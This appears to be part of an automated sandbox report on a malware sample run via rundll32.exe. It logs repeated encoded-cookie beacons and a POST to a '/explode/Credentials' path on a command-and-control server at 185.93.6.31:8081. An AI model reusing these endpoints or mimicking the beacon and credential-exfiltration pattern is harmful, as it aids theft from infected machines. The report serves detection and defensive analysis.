          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=wUIBGWQrdbdmd4sYK8wW0JYFtzs2H-6GQaDIq-ShDq2yqIdoUdXxgoN9bJpeP0PV7N488x_kkh3Ex2DzvIcIetvr_Z71gj-3fVzHmEQ5z0_riuQN9c8n48l4gdBeB03oNB0lDoFO97NfhGIfNt1wsXDzXTN8XPXvUfb69R5R3qivH0j5User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=2KzkdVVbW2VMaDPK8rfDCg7sEiyVXglWJ4IH8oKs56t3Dx861GfJKoXtSVLVx4kRp-lhQfcyQUWVxmBvbmAM6gin4jm3j_MHR4XEjBDcUnRuQWTeqs3R22Pi7TsU0iFirQK8DO863R_NnBUCIRqh4aPipWc5riydbNMv2O1jW2m6AYJaUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=6xT-pWfs_HV8Pq1iUeDOTbDYUVtD6DdycCVRRIzKvmoLlGNxF0dK7SS-P0NL38ugk7gWC83ASdw3YP56JHODzeSD22ePQWAfwKaJS4sineMb3gZ_fz_ll5mtj3m4rrxBGysn6YLO6ZjM_Yg5xNkRGhqEzaBzDcG3BmOBwk-Fi0jtW4DpUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=7OY85EmPSEpL07blBmgrLbuhisYbu9N7bAT1VskFM1CfDLqVfHHMf67ZUWdzm34owXoBDjJAr-DpY10OkSM1h_ZPwGPYJgJKUPj6ZWmd8rLGLtnw2GsaHuTcvC1zo3AVGbkY86zqyk5yIF_iG3lNTF1XYM5R-MgSfFLHCDP141WCu3UEUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=xB6RwEnpLtBQ2kZ_7gW2vxJeZ5mJ7HzjOzByR54ekh5rvWqPyNW8n5lfPOfJdfyku1sU9OuANPCJdBXactJ5XxQVl4yrPYayWzexOQxuJ8Fy8xFrtn-kbn9QmI4IYFTXsbDJufOIqKrRLmC3PajUVL9Q0NIlHFkocGFabfHRLtyms_fvUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=23bv4FeO7TBMXLwnYYLfCIC6QB5ziiY3QEdAAbyory879nI0JyVbqBTcLgZ7vdrlo9oHTv2iWJkHAu8_FBGSiNThyiK_I3Fa8MSYDrtAjKYrvBc6T1300qnPnjyIzK0EK0k2rLKs-N38n5l89LsAXyrm3OVDb9DyNgGQh3_nmg3dOZGsUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=gxJkDCZ7EKIkJ-4NaZxzxdRV0i50T4uTA_Ctvqbxa7jw-OJ9E4WUl8EtCY8cbybAro5Z5l209wiGlwXm_tdtb5m7mIu30lqiPwyijQZpqlqp2oEYt59C9oso5MUcVyj9dk1AG8MekqYd1AcKdI0VpDKjOCY-DJD6E6af4FwBu73tTy3sUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=WCtMTtXc817M75vxcjBrMY5ruhcV2aFtpwWvyQIrT5D3iLcBVOBhEQVq4WlVQCEqJ27Jene16X4VQchU7uek0YggSgI3CFs8xwJst5Bb-k_uxszlKkp54ONlRQCUVYlZLYUUN2-9dSRNG705oZ0J2iNlDVy5KYSm7FSH423k81I6hiphUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=1IRqMVh8aOFDrjn2bnBa2Y9Ixc98eKPmT7XF0LNaKv40BPflKNfeeRsuq9d0T180rCiCn_JQ3UgI8GruG-MXWdsTT_Ow0fSL_zYd37SyCXckTpLrQK9xA6Y9G-2HPijVJLuzfb1efQzzbRyt-0mFjiUUWTRMnVUjOfMVVnAVH9zSyxR9User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=LCNUaYlKIMeLFt5oxq1DoHtk4kvbfrv2rMGd2wnAW91fydIYvLSk8m4cOeqzXhalAb9pg_KFx20ppjWDUeZdCjaKqO4Y42rHkD2S6KlYmj8G67F9GK5ykyQZ1KCzZhiY2XxwfmwvosOy5Tdv27wlwZ2SCEORPaCfvJevhfMwi9hCfh2JUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=wvwn9k8LmOZWOPBJ6OcAiRS80a-PDsrVPdLEcZj8JChtX9y5zjcKqZ-9itHPl0qSvbmiwu1igsaPlqPsdDDPaRL3Ibqt3zCEXdUHDwqMkfd0EaddsJ0SWHmyLrgOguLht1J_j_VqHpzXzNaBO0piYrmyZuQj_u8edoPsW_czmOqgUUHZUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=F3tSopuDUHKAUQFlrY9iSky3_Vy_h5t1jEr9Q3ClEm33-8926yjm6tjRk0S3sGenb9e6DDGv5dvLD1J92Bwvyhjsd2BzLswYPMklTHdNMeTnsap4g1BJkGXCI35EwRBG50SL7n6hRZ8wkiQ-OLa9HebrYaePYm2w-gwtxbPqJ08RNCzuUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=MwlQXZZgJPOUPNpc2YdHlGRO5n_EVL_Cs-uZ7xbqX-lA49Yso56gxnE2Pd6sdBKRHpVtt-2vw1k2jDG3TsxZPimgrNoHyW7zjxeW3LZyngsZwbVJB4R2pzsz0JSsTBysxlZ0SnMFpvetzzNbxJYh9YK4DHeOF6Sro72rsewaj-xdVBm9User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=VumxgtoRs1LBw-JF7B2Bag0lHnz-FXhVzdgeYzE38U22aSxWqroFyplDcGT2IoSHLkVZLHA9BvuKnbFdmY7M6ll-lEAyvC84fVvGbDbf0sSmI0lYwsKqsCRQwF4FU_NmptZozj8zpr9xAMceeSRePad5gofO8I6Qu57O5fJ4xG9Qps_OUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=cSQEdPzTu2Tl4NPLWz8jC6dk8i081ulXjgrn8yskB6reh_87fe8pKyxlqVN8T2kQDmGBQF66oUQ8ToBux-js66EvAjgeBxMG7g0kjblUsnXHyYTfA0Ux2spqDTq9WsFjBIpcDUayPR5kFPUDiJJB4ApqRWaQJsycxVvP2UTru2gTiWJbUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=njlWhztQIik5DNyGdLdBTsl-4KVpZLkYHtufNbvaWTPt09D2Dq6mHNwGOwQBRBRLs6VrbUCfxYObvDdt4_xf5ISQqgCq-WgpIieQBhtCmNG08bOTqrRwfZYD1k4BfBp2a2ZykN41oC0A_zWBaaYnLy-ICq0jJ6JxDo2ta0EqiTbwZB9nUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=v57xvjJpTq4rWiYBlYXWwWneB-fybBydQLASOeWe8mAQPQrxs1Xc4eLfXJmy9ZzawNt0ipAAVI7y9HWkCVIZIW-V9_LQvebMILfRR3fuR78Jc3EVzf_EEATQ-PBz4DSpyjCpx4gIyNSqrgDJRii0KsTQsKxenDlWC-E6E4pRTqLdM5eRUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=zv9990IHfydZ1S4wdAtNH5Uz0glmA7QgVc7SFqkhPTguf-AjMqzJvwFVvBFuNEjytlOVWegryo4Si30oAZgAn8FoWDWqquNN5U0KGa7JHrE-NYUtWtRmxbxGDCudRT8TPsCku6clasrpFgtr4TKSSD9vTvJW5kLlI4gCkGpuCBrIsAO7User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=a3l4b84QDMHMTPJugfdvpjw-zk2cJJfw65ux3U6ad9sYk_4e--6I9ClGFez0BDqjRuVFhbXf62tu_BmFFrxxDHHQhOhfuUbB12e-7u4CtjlBsZ17X_RelWND-Kb0PDSeniZceCt1jsX1vxtpnOYJx9rIJEXWZ4yZ-82Dg7Rqp94FJDGPUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=wazc5UxbY_VVaAta67f7mhfsKryMXjHGPoI_Ypus3ztuDyeqzWfxupztccLMx7GBvulZ0e4yedWMxlj_d2A0ehGn2qmuj8uXXoX8HAncauR3QVxOs83pS3ri1asN0hnytAKEnPY65Y_UnC2SOBqZcbrinfcgrhQNddMXSPRjY_mjAbrKUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=xHFrq0iJaXtTWzhsfoVbQ5-9xFVsjaJ8X0DESqOvK2Qk8fZ_OCLf4wvbqk1kul6uvN2DBeKl3NIYBWt0CxYWw8vmTmmgJPUR78McRaRHCO00u5NxUFpwmbbIGneXyylPNE6y562rfJbjmB0367yEFDXhWK5caFS5KQYUzGDgHkbCPhXnUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=fb4kWdjXUPfai65YlzAzkCr5knuK48vG_Vzt61hdK-0OVKIo7SnUwj-BSdriw2aVUCIZs6MYt114O0WzAHstOmcX2N5Jfhr3waDi2PjF6g9XdsFNSTMCo3WEpJDi-2ioiOEATj2y0vPjeEdfiiFV8cwPeHPAoNCv7QrftaKt--gT4225User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global traffic | TCP traffic: 192.168.2.7:49740 -> 185.93.6.31:8081
          Source: Joe Sandbox View | ASN Name: CDN77GB CDN77GB
          Source: unknown | TCP traffic detected without corresponding DNS query: 185.93.6.31
          Source: rundll32.exe, 00000005.00000002.638169896.00000243BC8F2000.00000004.00000020.sdmp, rundll32.exe, 00000005.00000002.638113535.00000243BC8E9000.00000004.00000020.sdmp | String found in binary or memory: http://185.93.6.31:8081/Calculate/team/WIQK6GMJ
          Source: rundll32.exe, 00000004.00000002.637898471.0000012254C38000.00000004.00000020.sdmp, rundll32.exe, 00000005.00000002.637497118.00000243BC870000.00000004.00000020.sdmp | String found in binary or memory: http://185.93.6.31:8081/Register/v7.19/UJCIF1N2
          Source: rundll32.exe, 00000004.00000002.637898471.0000012254C38000.00000004.00000020.sdmp | String found in binary or memory: http://185.93.6.31:8081/explode/Credentials/6R1C1XVKLMP?_NDUSZDOG=BEEBAOMDCBHADPPFCEHFDNPACA6
          Source: rundll32.exe, 00000003.00000002.637621394.0000019BD604E000.00000004.00000020.sdmp | String found in binary or memory: http://185.93.6.31:8081/explode/Credentials/6R1C1XVKLMP?_NDUSZDOG=CHBGJBMJBGCHKAPNBHCDKDPMBOCO
          Source: rundll32.exe, 00000005.00000002.637497118.00000243BC870000.00000004.00000020.sdmp | String found in binary or memory: http://185.93.6.31:8081/explode/Credentials/6R1C1XVKLMP?_NDUSZDOG=KDDINCJEJFALOEKAJEAIOLKAJB
          Source: rundll32.exe, 00000005.00000003.335866871.00000243BC911000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000002.641154135.00000243BE628000.00000004.00000001.sdmp | String found in binary or memory: http://jqueryui.com
          Source: unknown | HTTP traffic detected:
            POST /explode/Credentials/6R1C1XVKLMP?_NDUSZDOG=CHBGJBMJBGCHKAPNBHCDKDPMBOCO HTTP/1.1
            Accept: image/*, application/xml, text/html
            Accept-Language: es-pe
            Accept-Encoding: gzip, *
            User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Host: 185.93.6.31:8081
            Content-Length: 11120
            Connection: Keep-Alive
            Cache-Control: no-cache
          Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_0000019BD7B00128 HttpOpenRequestA,VirtualAlloc,InternetReadFile,
          Source: global traffic | HTTP traffic detected:
            GET /Register/v7.19/UJCIF1N2 HTTP/1.1
            Accept: application/json, application/xhtml+xml, image/*
            Accept-Language: zh-cn
            Accept-Encoding: identity, br
            User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Host: 185.93.6.31:8081
            Connection: Keep-Alive
            Cache-Control: no-cache
          Source: global traffic | HTTP traffic detected:
            GET /Calculate/team/WIQK6GMJ HTTP/1.1
            Accept: application/xhtml+xml, image/*, application/xml
            Accept-Language: es-do
            Accept-Encoding: *, compress
            Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=fc3_iPE1_Vjq56xPxznPYCYBUHbVMTZf5vxQaRoTv0edTWJcgZ5LwLJnPm7dBsqNBWEXJlsZSPGhuf9XsqqC4HJa2koZmGEyVn-IZh37nM6NBwdS6ebkug90jlQud71sjfImxBQX6LVaJIkUUgAQN4xdzI3l1MCakLqA79lcimV7goHE
            User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Host: 185.93.6.31:8081
            Connection: Keep-Alive
            Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=-s7y9nY28CZt5KExQDrCHqECXQhSMjshYf9dF50QsjkaTm8iBp1GvjVkMxBaBcfzgmIaWNwaRY8muvIpNamPnvVZ1zSem2xM0XyFGJr4kbAKBAosbuXpxIh3gyqpdLASCvErupMU5cvdJ4Rq1QMdSQtewfNi183kF7mNkV5fhxv8gYy6User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=k_1myR4K2dkHObF2ueZBtkW9kJDeD4vqbNOFTsn9ZRc8Xp2GnzZLls68y-6elgut7Ljj_bxjw_nel-LTJTGOVkP2YIX83nG7DNRGMFuN0MglEOZi4ZxTZyizb4dfg6Pe5lM-sKRrX6OGzZe-aksjXeizJ9ty_64hJ4KtZKYy2dXxUADmUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=8_dwoFaeBA5UwvqhGXlnaaSwxoIEqp8_cxW5EtYUfxSAHfbRY2CAO7HIHSNsijJs3mtNSi1R46T2chFKjjJ5w-lejCfHN04OT-m2IXaMvvbZP5W0x3pWWvvN8GlssjxRBqhUt7P7hgptMROmBGgBCEJGLIpO6YRWY0OLTCzkrxGdqjlAUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=mMjIihQwyloP4ptNIjz4YsMEZ3QwNAFdA_lna_8WiEV4SFVeZJt8wldiCWw4A_2P4GQgJL4cf_NEvMhVV6-14pdf7Uj8nVYws3q_ZPj-q8xoAjBQDOPTuOpxuVbLcopuaPcRxvES37e_Ib4WtwUnNWlY-48A0feYdb-37TxZvWeeh7bGUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=aOtv7-Uc0P_8L7hQQvBIkL6rmbYlGYLMl8WMaDLrbDHHSJSgZCBCsDWqwshlgAKLF67q20d1yt8lgev13ieHcLjgaaMHyHid98JPFqCb2e7eBu9EGopaQdOlZqGklar4HUU3ll99VoV9256YkV0qexOlLv2J6acH3JSkQl0k0PMKRgnAUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=9iHDV1NIt_lRFElWHK_UnqFmdXUBfCzIdsMK5dPCzOOFy0UmZrYzzLQertRpXIGb273-vSiHUFPzpKK9i-TKNOyIP9DC4f35Sj8F1nNaDQHc6SZDwqzlrf4bQ55pZI-mA37nQLYtNf1o56BRAb6y_0eQn31LPzehZpU4uykyHOaYfIq3User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=n1yu4hKrEfILmHldtUeJnUkcWLvSrkPBYHJNZcVcrTww_1Wtk5eDvcIdA8WSN8OG4Bkr1rDCC9LSNir4KZBGfU9XqK7wf7mQAHWOG1csGOMpsS5J7T2bTCQSp6xTImv16vL2m6jKl4iKbF-VZurrduQS7_B-XmYKKyNlT6qTEf798cjNUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=g0eC4A-_gDAUbdEnObOyCNiLLR4ru0s3GHYtAeSZwi9jxx80fxQ2qEztQwYjjLfl--tqTqWTNZlfM4I_TCD_iIzQpyLnEhxaqPX1DuNx4aZzjXo6F2yZ0vH-8zzQ_cAEc3hbrOqdld2krvR8rIptX3LXseUbXr3ybjD9hyfW9w2FCPysUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /Calculate/team/WIQK6GMJ HTTP/1.1Accept: application/xhtml+xml, image/*, application/xmlAccept-Language: es-doAccept-Encoding: *, compressCookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=oIPDnwXqtzEHtkmeSg3UVvfEdb1X3iwAIGEKLYVgzCvTaUXuMBQzBOK8rhw__oFTjR_-dX4lUJulBqJ13UbK_LoqPxiUQ_0xHJ0FHiX4DcmKSyaLlA7lZai5Q1Y_xo9uVdzniOCPNTU-RaCZVxyyNxEyn7UdnTdpMDc4c3-QHC7O3op_User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: 185.93.6.31:8081Connection: Keep-AliveCache-Control: no-cache
